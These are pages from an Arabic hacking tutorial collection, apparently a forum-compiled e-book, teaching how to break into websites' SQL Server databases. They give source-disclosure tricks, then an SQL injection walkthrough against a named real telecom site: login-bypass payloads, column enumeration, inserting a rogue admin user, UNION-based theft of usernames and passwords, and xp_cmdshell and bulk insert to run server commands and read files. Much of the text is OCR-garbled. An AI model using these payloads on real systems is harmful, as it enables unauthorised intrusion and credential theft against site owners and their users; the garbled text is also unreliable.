خا عشانكده لازمتقراالسورس بتا عالاكسبلوی ت..وكل اكسبلویتلها ساینتكس و شغل المبادئالاساسیه واحده....‏<br />

..<br />

<strong>١</strong>٥٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" اختراق الSQL "<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$<br />

الكاتب:‏ linuxray<br />

$$$$$$$$$$$$<br />

س:فيالبدایة ماهيالاسكیوال<br />

) SQL ‏)؟؟<br />

الاسكیوال هي عبارة عنقاعدبیاناتتحتوي على جداول واغلبالمواقعالتيتكون صفحاتها منتهیة ب<br />

ASP هي صفحا تتسحببیاناتها منقاعدة SQL وصفحات ASP ممكنانتكونكنز منالمعلومات<br />

لاختراققواعدبیاناتQLS وهذا ماسو فاشیرالیه لاحقا ، و SQL تتنصت علىالبورت <strong>١</strong>٤٣٣<br />

ایضا مااریداناخبركبهانال SQLقدتحتوي على اكثر منقاعدةبیانات وكلقاعدةبیاناتتحتوي<br />

على عدد منالجداول یمكن<br />

ان تتصوركبرقواعدبیانات SQL والعددالكبیر منالبیاناتالتىتحتویها .<br />

س:‏ مالذيیمكناناستفید منهاذااخترقتقاعدةبیانات SQL ؟<br />

هذا على حسب نشاطالموقعاذاكان هذا الموقع منتد ى لااقصد منتدیات PHPبل منتدیات ASPفي<br />

الغالب سو فت حصل على جمیعاسماء<br />

المستخدمین وكلماتالسر وبامكانكتعدیل وحذ فاي موضوع وصلاحیاتلمتكنت حلمبها ‏،امااذاكا ن<br />

الموقع یحتوي على میزة<br />

قائمةالمراسلا تفسو فت حصل علىاعداد خیالیة منالایمیلات ، عندهاقمبانشاء شركةللدعایة والاعلان<br />

وسو فتصبحثریااذنلاتنسى LinuxRay_<br />

توقعانتجداي شئ داخلقواعدبیاناتمعلوماتاشخا ص ‏-ارقام هوات ف<br />

ممكنانتصبح<br />

اعر فانهقداصابك المللالانلكناستعد نشاطك من جدیدفالطریق مازال طویلا<br />

- عناوین ‏-تورایخالمیلاد ،<br />

...<br />

. Administrator<br />

س:‏ مالذيتحتاجةللدخول علىقواعدبیانات SQL ؟<br />

تحتاجفقطلل User Name و Passwd<br />

س:‏ منایناحصل علىاسم المستخدم وكلمةالمرور ؟<br />

هناك طرق عدیدةلل حصول على User name and Passwd منهاكمااسل ف صفحاتال ASP<br />

وملفاتاخرى من نو ع ‏*.‏sqlهناكثغراتكثیر یمكن<br />

انت حصل منها علىكلمات المرور مثلثغرة htr.+<br />

كی فتستخدم هذهالثغرة<br />

:<br />

htr.+asp.page/target//:http<br />

target ‏:الموقعالهد ف<br />

asp صفحة : Page<br />

htr.+ ‏:الثغرة<br />

هذه الثغرةتقوماحیانا بفتح صفحةبیضاءلاتحتوي علىاي حر ف ‏....اعر فانك سوف تتساءل مالفائدة<br />

اذن منهاالفائدة هو<br />

خل ف هذهالصفحةالبیضاءاذهبالى Viewلكيتر Source ىاوامرالبرمجةالخاصة ب ASP التى<br />

<strong>١</strong>٦٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لایمكنلكانتراهافي الوضع العادي<br />

: مثل<br />

%><br />

("Connection.ADODB")CreateObject.Server =Set DB<br />

SQL =DRIVER"Open .DB<br />

Developer (R)Microsoft ؛PPA‏=‏ =sa;PWD=xxx;UID=Server;SERVER<br />

"٦٦٦٦٦٦٦" ،"yaRxuniL_" ،"moe_dbs=xxx;DATABASE=Studio;WSID<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لی س منالضرورةانتكونالملفاتبهذهالاسماءلكن هذا هو المعتاد علیه منقبل مبرمجین SQL<br />

وكل ماعلیك فعلهانتكتباسمالصفحة مثلالاتي<br />

:<br />

htr.+asa.global<br />

هناكثغرةقدیمةفي ٣IIS وهيانتضی ف بعد صفحة ASP هذاالرمز ‏::$‏atadكما یلي<br />

atad$::asp.file<br />

هذه الثغرةلاتعملالا على ‎٣IISفلا تتعب نفسك بتطبیقهافقطللعلم لااكثر<br />

.<br />

لقداقتربنا من النهایة<br />

... ماذا بعدال حصول علىاسم المستخدم وكلمة المرور ؟؟<br />

بعدهاالدخول علىقاعدةال !! SQL<br />

هناك عدةبرامجتدخل علىقاعدةالبینا تانااستخدم ‎٦٫٠‎لكني Visual interdev مازلتافضل<br />

استخدام البرنامجالسهل<br />

٢٠٠٠ACCESS<br />

كل ما علی ك فعلههو فتح البرنامح الذهاب الىقائمة<br />

File<br />

اختر<br />

New<br />

ومنقائمةالملفاتالجدیدةاختار<br />

.<br />

(Exiting Data)Project<br />

اي مشرو عقاعدةبیانات موجودة<br />

سیظهرلك مربع لانشاء الملفاختر<br />

Create<br />

ايانشاء<br />

الان سترى مربع<br />

Data Link Properties<br />

تحتاجفق طلثلا ثمعلوما تاسم الموقعاوالايبي-اسمالمستخدم ‏-كلمة المرور<br />

Select or enter server name<br />

<strong>١</strong><br />

‏-ادخلاسمالموقعفي صندوق<br />

٢ ‏-اسمالمستخدمفي User Name<br />

٣<br />

‏-كلمة السر Password<br />

ملاحظة ‏(قم بإزالةالصح من مربع (Blank Password<br />

اضغطفي البدایة على Testفيالاسفل Connection لاخ تبارالاتصال بقاعدةالبیانا تاذا رأیت هذه<br />

<strong>١</strong>٦٢


hi_HaCkEr & MaXhAk2000<br />

:<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

العبارة Test Connection Succeeded<br />

فمعناهانالاتصال بقاعدةالبیاناتتمبنجاح.‏<br />

یمكنكالانانتختارايقاعدةبیاناتترید الدخولالیها منالقائمةالمسندلة<br />

Select the data base on the server<br />

واضغط على OKاو موافق ...<br />

<strong>١</strong>٦٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" درس مفصل عن الSQL "<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$<br />

الكاتب:‏ hish_hish<br />

$$$$$$$$$$$$$<br />

أتجهت غالبیةالمواقع لإ ستخدام صفحات دینامیكیه ومنها ما ن حن موجودینفیه :)<br />

وتستخدمقواعدبیانا تفیهاكمكبیر من المعلوما ت,‏<br />

وعن طریق سكربت مكتوببإ حد ىلغات الویبالدینامیكیه PHPأوASP والتيتعمل جمباإلى جمب مع<br />

محركاتقواعدالبیانات<br />

.<br />

SQL Server , MySQL,Oracle<br />

یتمأستخلا ص المعلوماتالمطلوبهوتركالبقیه<br />

حی ثتأخذمعلومات منالمستخدم ومنثمتعالج ویستخدم بعضهافيتكونأوامرال SQLلیتمأستخلا ص<br />

البیانا تأوالتأكد منصحة بع ض المدخلاتلبناءالصفحةالمطلوبهأوقبولالمستخدمأو رفضه دائمایتم<br />

طلبأسم مستخدم وكلمة مرورفيالصفحاتالتيتخولك بعمل عمل لا یقومبهإلا منقام صاحب الموقع<br />

بإعطائهالصلاحیهللقیامبهاكأن یقومبحذ ف موضوعي ‏:)أوتثبیتهفي القائمه<br />

حی ثیتمالتأكد من وجودأسمالمستخدمفيقاعدةالبیاناتوأنكلمةالمرورالمعطاه مطابقه لتلكالموجوده<br />

بجانبأسم المستخدم حی ثیتمأخذ معلومهوتضمینهافيأمرال SQL الذي یقومبالتأكد من وجودها<br />

وصلاحیتها ولكن یجب الحذر عند كتابة سكربت یقوم بتوثیق المستخدملل تأكد منأنه مخوللهبالدخول<br />

للصفحه المحمیهأم لا وذلكبالتأكد من نظافةالقیمالمستقبله منالمستخدم وخلوها منأي رموز من شأنها<br />

أنتجعلأمر ال SQL خاطئفيبنائهأوالقیام بأيأمر غیر مسموحبه<br />

((((:<br />

سنتكلمالآن عن ما یسمى SQL injection<br />

حیثأنهضع ففي كتابة سكربت التوثیق وأیضابوجود موقعللتجربه<br />

وهو موقع شركةالإتصالاتالسعودیه<br />

عنوان الموقع http://www.stc.<strong>com</strong>.sa/<br />

عند الدخولللصفحةالرئیسیه نجد رابط یخت صبمقدمي خدمةأنترنتفيالسعودیه<br />

وهو<br />

عنددخولهفأنه یطلب منكأسم مستخدم وكلمة مرور<br />

دائمافيالحاله هذهأول مایتبادرلنا هو الinjection SQL<br />

نقوم بتجربة<br />

http://www.stc.<strong>com</strong>.sa/arabic/scripts/ar_frame.asp?pagenum=25<br />

!!!!<br />

أسم مستخدم : '<br />

وكلمة مرور'‏ :<br />

فن حصل علىالخطأ التالي<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e14'<br />

<strong>١</strong>٦٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed<br />

quotation mark before the character string '' '.<br />

/arabic/Scripts/ar_csd_reply.asp, line 33<br />

وفي بع ض الحالا ت یظهرالخطا التالي<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e14'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed<br />

quotation mark<br />

before the character string ''' AND Password=''.<br />

/admin/admin.asp, line 13<br />

وفي الخطأ هذا حصلنا علىجزء منأمر ال SQL وأیضاأسمأحد الأعمدهفيالجدول<br />

وهو ما یؤكدأمكانیة عمل injectلل SQL Query المستخدمهللتحقق صلاحیةأسمالمستخدم وكلمة<br />

المرورالمد خله .<br />

إذنلنتكلم عنال SQLبشيء injection منالتفصیل<br />

لوكانلدینا سكربت یقومبالتأكد من صلاحیةاسم المستخدم وكلمةالمرور المد خله من المستخدمقأننا<br />

سنتحقق منهابالطریقة التالیه<br />

code:<br />

SELECT * from Users WHERE User_Name='' AND Password=''<br />

if( TRUE ){<br />

Login OK<br />

}<br />

else {<br />

Login FAILD<br />

}<br />

<strong>١</strong>٦٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

:<br />

عندقیامأحد المسموحلهمبالدخولللصفحةالمحمیهفأنه یقوم بكلتأكید بتوثیق نفسهقبلأن یسمحله<br />

بالدخول<br />

فعندقیامه بأدخالأسمالمستخدم وكلمة المرورالخاصهبه<br />

أسم المستخدمadmin :<br />

كلمة المرورt0ps3cr3t :<br />

فإ ن شكلامر ال SQL سیصبحبالشكل التالي<br />

code:<br />

SELECT * from Users WHERE Users_Name='admin' AND<br />

Password='t0ps3cr3t'<br />

وعند وجود سطرفي جدول Userتحق قفیهالشرط وهوأن یكوناسمالمستخدم admin وكلمةالمرور<br />

t0 ps3cr3t<br />

فأن الأمر سیقومبإرجا عقیمة TRUEأيأن المستخدم مخولبالدخول<br />

غیر ذلك سیتمإرجاع FALSEوسیتم رف ضالدخول<br />

.<br />

ملاحظه ‏:یجبأن یكونلدیك ولوالقلیل من المعرفه بأوامرال.‏ SQL<br />

form> field‏>یحل from web م حلها ماأد خله المستخدمفي صفحةالتحقق من صلاحیته<br />

فيتجربتنا عندماقمنابإدخال ‏'كإسم مستخدم وبالمثللكلمةالمرورفأنأمرال SQLأصبحبالشكلالتالي<br />

code:<br />

:<br />

SELECT * from Users WHERE User_Name=' ' ' AND<br />

Password=' ' '<br />

ونلاحظأنناقمنابإغلاق علامة التنصی ص الأولى وبقي علامةتنصی صلمتغلق بعد<br />

وهو ماأدىلظهور رسالة الخطأ!!‏<br />

الأن نقوم بتجربةاٍم مستخدم‎1'='1‎‏'‏ : blah' OR<br />

ومثلهالكلمة المرور.‏<br />

فیصبح شكلأمرالSQL<br />

code:<br />

SELECT * from Users WHERE User_Name='blah' OR '1'='1'<br />

AND Password='blah' OR '1'='1'<br />

<strong>١</strong>٦٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لن حلل الأمركلجزء على حدا<br />

SELECT * from Users<br />

تعنيأختر جمیعالسطور منالجدولUsers<br />

WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'<br />

في هذاالجزء نقوم بتحدیدالسطر الذي سنقوم بإختیاره وهوالذي تتحق قفیهالشروط<br />

'blah' OR '1'='1'<br />

هنابوجود ORلمتصبحقیمة نصیه ولكنأصبحت شرط<br />

یصبح الشرط ص حیحإ ذاكان طر ف واحد على الأقل من الأطرا فالمشتركهفيالشرط ص حیح<br />

وفي حالتنافإ نالطر ف الأول هو'‏blah‏'‏<br />

وهوبدونالخو ضفيتفاصیللسنافي صددهاالانیعبر عنقیمةص حیحهTRUE<br />

والطر فالأخر هو '<strong>١</strong>' ='<strong>١</strong>'<br />

یمكنكالإجابة عنإ ذاكانت <strong>١</strong> مساویهل ‎<strong>١</strong>‎أم لا<br />

إ ذا سیكون شكل الشرط بعدت حلیله هوTRUE TRUE OR<br />

وبالتاليفإن النتیجهالنهائیهللشرط هيTRUE<br />

ونفسالتفاصیلتحد ثلكلمةالمرور<br />

ملاحظه مهمه جداُ:القیمه TRUE التي ن حصلها منالشرطلیست مساویهللكلمه TRUE التي نكتبها<br />

علىلوحةالمفاتیحالخاصهبنا<br />

لذلك لاتحاول إ ستخدامأسم مستخدم TRUE وكلمة مرور TRUEلإتمامالinjection SQL<br />

!!!!<br />

الشرط السابق سیقوم بأختیارأول سطر من الجدول Users ویرجع محتویاتهفي مصفوفه<br />

وبالتاليفي بع ضالحالات ستجدأنكقدأستطعت الدخولللصفحةالمحمیه<br />

ولكنفي حالاتأخرى لا<br />

لنكملالتفاصیل.....‏<br />

یجب التنبهلأنه ربما یكون الشرطفيأمر ال SQL وهو ما یأتي بعد WHEREیتحقق من عدةأشیاء<br />

لذلك نستخدم dashes) (two ‏--لیتمإهمال بقیةالسطر حیثیمكننا ا لإ ستعاضه عن ماأدخلاناهقبل<br />

قلیلبالمدخلاتالتالیه<br />

،<br />

أسم مستخدم--'‏‎1'='1‎‏'‏ : blah' OR<br />

وكذلككلمةالمرور ‏(في بع ضالحالات یمكنكإهمال كتابةكلمة مرورلأن -- ستهملهالأنهاتأتي بعداسم<br />

المستخدمفيأمرالSQL<br />

توجد طریقه مریحه جدا ومضمونهب حیثأنكلنتحتاج لتخمینأحدأسماء الأعمده<br />

وهيأستخدامclause having<br />

بالطریقهالتالیه<br />

أسم مستخدم'‏‎1=1‎ --having<br />

حیث سن حصل على رسالة خطأكالتالیه<br />

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />

'cs_isp_user.UserID' is invalid in the select list because it is not<br />

contained in an aggregate function and there is no GROUP BY clause.<br />

<strong>١</strong>٦٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

/Arabic/Scripts/ar_csd_reply.asp, line 33<br />

وبهاأسم الجدول وأیضاأسمأول ع مود<br />

بعدهالنستطیعال حصول علىاسماء بقیةالأعمده<br />

سنستخدمby group<br />

بالشكل التالي<br />

--group by cs_isp_user.UserID'<br />

بعدها سن حصل على عمودأسمهpasswd<br />

فنستخدمهلل حصول علىاسمالعمود اللي یلیهبالشكلالتالي<br />

--group by cs_isp_user.UserID,cs_isp_user.passwd'<br />

ونكرر زیادةأسمكل جدول مع العمودإلىأن ن حصل على صفحةتخبرنا بأنأسمالمستخدم خاطئ !<br />

نحتاج الأنأن نقومبجمعأكبرقدر ممكن منأسماءالأعمدهفي هذاالجدول<br />

نقومبإدخالالتالي:‏<br />

أسم مستخدم--(‏username‏)‏ : blah' group by<br />

فن حصل علىالخطأ التالي :<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e14'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid<br />

column name 'username'.<br />

/arabic/Scripts/ar_csd_reply.asp, line 33<br />

وهو ما یفید بأنه لا یوجد عمودفي هذاالجدوللهالأسمusername<br />

نقوم بتجربه الأسماءالشائعه مثلusername,id,userid,email‏,‏ password<br />

,first_name<br />

عندتجربتنال useridفأننا ن حصل على خطأأخر وهو ما نبحث عنه<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e14'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />

<strong>١</strong>٦٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

'cs_isp_user.passwd' is invalid in the select list because it is<br />

not contained in either an aggregate function or the GROUP<br />

BY clause.<br />

/arabic/Scripts/ar_csd_reply.asp, line 33<br />

هنا حصلنا علىمعلومتین وهيأسمالجدول وهوcs_isp_user<br />

وأیضاأسمأحدالأعمده وهوpasswd<br />

نقومالان بتكرارالعملالسابق ولكن بإ ستخداماسم العمود الجدید<br />

فنقومبإدخالأسم المستخدم التالي--(‏passwd‏)‏ : blah' group by<br />

فن حصل علىالخطأ التالي :<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e14'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />

'cs_isp_user.UserID' is invalid in the select list because it is<br />

not contained in either an aggregate function or the GROUP<br />

BY clause.<br />

/arabic/Scripts/ar_csd_reply.asp, line 33<br />

حصلنا علىأسم عمود وهو UserID وهو نفسه ماقمنا بتخمینه وهوuserid<br />

تجدرالإشارهإلىأن MSلیس SQL Server حساسلحالة الأحر ف<br />

نلاحظأننا سنكونفي حلقه غیر منتهیه ولا ن حصلإلا علىأسماء الجداول UserID وpasswd<br />

إذنالجدول لا یحويإلا على عمودین وهي التي حصلنا علیها<br />

إذنفي الحاله هذه نقوم بأدخال مستخدم جدیدللجدول وبعدها نقومبالدخولبشكل طبیعي من الصفحه<br />

الخاصه بتسجیلالدخول<br />

سنقوم بكتابة التاليفي خانةأسمالمستخدم<br />

(:<br />

blah' INSERT INTO :<br />

(:<br />

cs_isp_user(UserID,passwd<br />

) VALUES('M_3','hi')--<br />

حیث سیتمإ ضافة مستخدم جدیدلهأسم مستخدم 3_M وكلمة مرورhi<br />

وبعدهاتستطیعالدخولللصفحةالمحمیهبهذهالبیانات علىأنك مخوللهبالدخول<br />

في مثالنا ‏(شركة الإتصالا ت)أنتهینا مناستغلالأمكانیة عمل injectلها ولكننا سنكملالحدیث عن طریقه<br />

<strong>١</strong>٦٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ممتعهلكي نستطبعقرائةاسماءالمستخدمین وكلمات مرورهم وبعدهاتستطیعالدخول بأي منها دون<br />

إ ضافة نفسك<br />

وهوالأمرالذيلن یضع شكوك حول وجودلشخ ص مشبوه<br />

سنكمل مابدأناه ولكنبإ ضافة عمودأخرلهالأسم id وهو رقمتسلسليلكل مستخدم ‏(تذكرأنه رقم (<br />

إذنلدینا جدولأسمهuser<br />

یحويالاعمدهالتالیه<br />

idوهو رقم ص حیح<br />

نصیه ‏(القیمالنصیه یمكنأنتحويأرقام)‏ مثالadmin1‎ usernameوهوقیمة<br />

passwdوهيأیضاقیمه نصیه<br />

نجرب عمل unionلقیمه نصیه وتحویلهاإلىقیمة عددیه ‏(لنیتم التحویل ولكنه سیخرج رساله خطأ<br />

ثمینه جدا)‏<br />

ندخلاسمالمستخدمuser : blah' union SELECT username FROM<br />

و سن حصل على رسالة خطأ لاتفیدنافي شيء<br />

رسالةالخطأهي<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e14'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries<br />

in an SQL statement containing a UNION operator must have<br />

an equal number of expressions in their target lists.<br />

/admin/admin.asp, line 13<br />

نقوم بزیادة id مره واحد فتصبحبالشكل التالي<br />

blah' union SELECT username,username FROM user<br />

فن حصل على نفس رسالةالخطأ<br />

نتابعالزیادهإلىأن ن حصل على رسالة خطأ مختلفه<br />

لنفتر ضأننا حصلنا على رسالةالخطأ الجدیده عندأدخالاسم المستخدم التالي<br />

blah' union SELECT username,username,usernam<br />

e,username,username FROM user<br />

فن حصل على رسالة الخطأالتالیه<br />

<strong>١</strong>٧٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e07'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax<br />

error converting the<br />

varchar value 'Lame_Admin' to a column of data type int.<br />

/admin/admin.asp, line 13<br />

(: حصلنا علىأولأسم مستخدم وهو عادةً‏ ما یكونللأدمن<br />

وسبب ظهور هذا الخطأ هولأننا نطلب من محرك SQLأن یقوم بتحویلقیمة نصیه ‏(وهي<br />

إلىقیمة عددیه ص حیحه(‏int (<br />

وهوالشيءالغیر مسموح ‏،لذلك یقوم بأخباركأنه لا یستطیعتحویل Lame_Adminإلىقیمة عددیه<br />

ص حیحه :) هذاأذكى شيقامت microsoft بعمله<br />

الان حصلنا علىأسمالمستخدم وسنحاولال حصول علىكلمة المرور<br />

ندخلأسمالمستخدمالتاليpasswd,passwd,passwd,pass :blah' union SELECT<br />

(:<br />

Lame_Admin)<br />

wd,passwd FROM user<br />

بنفس العدد السابق عند حصولنا علىأسمالمستخدم<br />

سن حصل على هذا الخطأ<br />

اقتباس :<br />

Microsoft OLE DB Provider for ODBC Drivers error<br />

'80040e07'<br />

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax<br />

error converting the<br />

varchar value 'stupid' to a column of data type int.<br />

/admin/admin.asp, line 13<br />

حصلنا علىأسم المستخدم وكلمةالمرور ویمكنناتسجیل الدخولللصفحة المحمیهبدون وجودأي أثرلنا<br />

إلاإ ذاكانتالصفحهالمحمیه عندالدخوللهاتقومبطباعة بع ضالمعلومات مثل رقمالایبيلأخر شخ ض<br />

<strong>١</strong>٧<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

قامبالد خولبإسمالمستخدم هذا<br />

عندهافكربما ستقومبهبنفسك<br />

بقيأتكلم عن ال Stored Procedure<br />

وهي كتشبیه أقربإلىأدوات موجوده مسبقا Built-inتقوم بعمل محدد عند طلبها<br />

ستستطیعا لإ ستفاده منال Storedإ Procedure ذاكانال SQL Server یعمل علىالمستخدم<br />

sa<br />

أوإ ذاكا ن المستخدم الذيیعمل علیهال SQLتمالسماحلهباٍ‏ Server ستخدامها<br />

لذلكفأنت م حظوظ عند حصولك على SQLبهذهالأمكانیات Server<br />

یوجدأكثر من<br />

Stored Procedure <strong>١</strong>٠٠<br />

في الجدولالتاليأهمها<br />

+ ---------------------------+-----------------------------------------------------------------------<br />

-------+<br />

| xp_cmdshell----------|<br />

|---<br />

| xp_regread-----------|<br />

|-----<br />

| xp_regdeletekey----|<br />

|-----<br />

| xp_regdeletevalue-|<br />

|----<br />

| xp_regwrite ----------|<br />

|------<br />

| xp_servicecontrol--|<br />

|----<br />

+----------------------------+----------------------------------------------------------------------<br />

-------+<br />

تمریرأمرلنظامالتشغیل ‏(یتمتنفیذه على حسب صلاحیات المستخدم )----<br />

قراءةقیمة مفتاحفي الریجستري---------------------------------------‏<br />

حذ ف مفتا ح من الریجستري--------------------------------------------‏<br />

حذ فقیمة مفتا ح من الریجستري----------------------------------------‏<br />

للكتابةفي الریجستري-------------------------------------------------‏<br />

لبدأأوأنهاء خدمة على السیرفر----------------------------------------‏<br />

أما<br />

طریقة ا لإ ستفاده منأي من هذهال Procedureفهيبالشكلالتالي<br />

'exec master..xp_cmdshell 'dir<br />

هذا مثاللطریقةأستخدام xp_cmdshell والبقیه مثله<br />

عداالكتابةفي الریجستريفهوبالشكلالتالي<br />

'exec master..xp_regwrite 'REGISTERY KEY' VALUE<br />

<strong>١</strong>٧٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

أیضا بقيالإشارهإلىأنه بأمكانكقراءةكود ملفا ت asp التيیعمل علیهاالموقع عن طریقإ ضافة جدول<br />

جدید ومنثم نسخكود صفحة asp ووضعه<br />

في هذاالجدولبالطریقةالتالیه<br />

((CREAT TABLE M_3 ( source varchar(8000<br />

هذا السطر یقوم ببناء الجدول وأسم الجدول 3_M وبداخله عمود واحد من النو ع varchar<br />

‎٨٠٠٠‎بایت<br />

حجمه<br />

بعد ذلك بأمكانكالانإ ضافةأي مل ف علىالسیرفرإلى هذا الجدول ومنثمقرائتهبالشكل التالي<br />

'bulk insert M_3 from 'c:\InetPub\wwwroot\login<br />

.asp<br />

ولقرائة ماتم نسخه یمكنك ذلك عن طریق رسائل الخطأالليتكلمنا عنهافي الموضو عالسابق<br />

أسهلها هو عمل union حی ثیتمتولید رسالة خطأبها ماتم نسخه....‏<br />

<strong>١</strong>٧٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

درس لإحتراف الهاك في اختراق المواقع<br />

"<br />

$$$$$$$$$$<br />

الكاتب CONIK:<br />

$$$$$$$$$$<br />

س:-‏ ماهيالثغرا ت ومامعناها ؟؟<br />

ج:-الثغرات هىضع فأمنى یساعدكفى دخول نظاممعین وأختراقه وقدتكونأیضاالطریقةالمساعدة<br />

التىتخلیك تتحول من user الى administrator یعنى من مستخدم الىالمدیرالمتصر فوتتضمن<br />

ویجب علىالدواممعرفة الثغراتالامنیهالجدیدة وأستثمارها علشان لایتنبهأصحابالمواقعبیها<br />

یرقعوها ‏(یتمتقفلیها)‏ وأقرب مثاللهذهالثغراتالضع ف الأمنيالذ ىأكتش ففيالاباتشى وهو سیرفر<br />

یركب على نظاملیونكس وأ ىضع ففىأحد البرامجأوقاعدهبناءالموقعتعتبرثغرة ومنالممكن<br />

استخدامها والأستفاده منهافيأختراق الموقعالمرادأختراقه والتحكمفي الموقع ومشاهدة الباسوردات<br />

وكل ماترید عن طریقها<br />

س‎٢‎ : - طیبكی فانااستثمرالثغرهاذاانالقیتها ؟؟؟<br />

ج : - من وقت ماأكتشفوا الثغراتكانت منالثغراتتكون سكربتاتها مكتوبهبالغه C وانته<br />

تحتاجلمعرفة هذهاللغهأو علیكتحویلها<br />

نسبة ٩٩%<br />

.<br />

كماأن هناك العدید منالثغرات یحتاجالى shell حتىانته تتمكن منالأستفاده من هذه الثغرهأوبمعنى<br />

أخر الضع ف وعلى سبیل المثال بع ضالثغرات الموجودهفى PHPتحتاج الى Shell PHP ومن هذه<br />

الكلام.‏<br />

وعلىفكرةالضع ف یكونفيالاصدارات الخاصة<br />

وكمانفيثغره من نو ع Kernel x.2.2 ولكن هذهالمرةفي نظامتشغیللیونكس<br />

‏(ملاحظه هذهالثغراتالتىتكونباللغة Cتكون سیكربتاتتوجودهفىالموقع ( وهناكأیضا سیكربتات<br />

أخر ى مكتوبةباللغه perl ولازمفى هذه الحالةتكونانته مركبلوینكس علشانالاوامر وأناأنص حك<br />

تركب‎7.3‎ linux Redhat<br />

لأنهأفضل منالماندریك وأذكرانهالأ خبلاك هانترلمنانا سألتهأركبالماندریك ولاالریدهاتقاللىانه<br />

الماندریك صورة مبسطه<br />

للریدهاتبس غیرقابلهللتطور وأنه الریدهات أقوى وجزاةاالله خیر على هذهالنصیحة نرجعللموضو ع<br />

س ‎٣‎‏:-كیفأحوللغهالبیرل ؟؟<br />

ج:-الطریقة مره سهلهكلهااوامر عادیةفيالبدایة انته سو ى هذه الأمر<br />

./file.pl<br />

تعطیك هذه الرسالة<br />

Denied---- Accessهذه الرسالةتوضح عدم الموافقه<br />

أذا صارلككذاك ل ما علیك سو ى كتا بتهالامر هذه<br />

Conik.pl----- chmodلاحظ x+ مكانكونیكانتهتكتبأسم الملف<br />

<strong>١</strong>٧٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

وشغلة مرهثانیة وشو ف النتجیه راحتكون ز ىكذا<br />

$ ./Conik.pl<br />

س‎٤‎‏:-‏ طیببالنسبةللغةC؟<br />

ج:-‏ علشانتحویل المل ف لازم انتهتخلىالمل ف یكون مل فتنفیذ ىبهذهالامر<br />

------> Conik.c gccلاحظانهانتهتكتبأسم -o Conik المل فبدالأسمىكونیكالمرادتغیرة<br />

یعنى على سبیلالمثال :-<br />

gcc -o Conik conik.c<br />

وراح یكون المل ف جاهز بعد هذهالامر<br />

./Conik.c<br />

وبعد ماصارالمل ف جاهز<br />

